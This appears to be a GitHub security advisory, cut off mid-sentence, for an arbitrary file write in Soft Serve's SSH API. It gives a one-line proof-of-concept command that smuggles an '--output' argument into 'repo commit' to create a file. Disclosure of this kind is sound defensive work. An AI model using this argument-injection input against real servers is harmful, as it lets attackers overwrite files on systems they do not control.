GHSA-33PR-M977-5W97 Soft Serve vulnerable to arbitrary file writing through SSH API
Description

Attackers can create or overwrite arbitrary files with uncontrolled data. For a PoC, spin up an instance of soft-serve as explained in the README, and execute the following command:

```sh
ssh -p23231 localhost repo commit icecream -- --output=/tmp/pwned
```

It should have created a file in…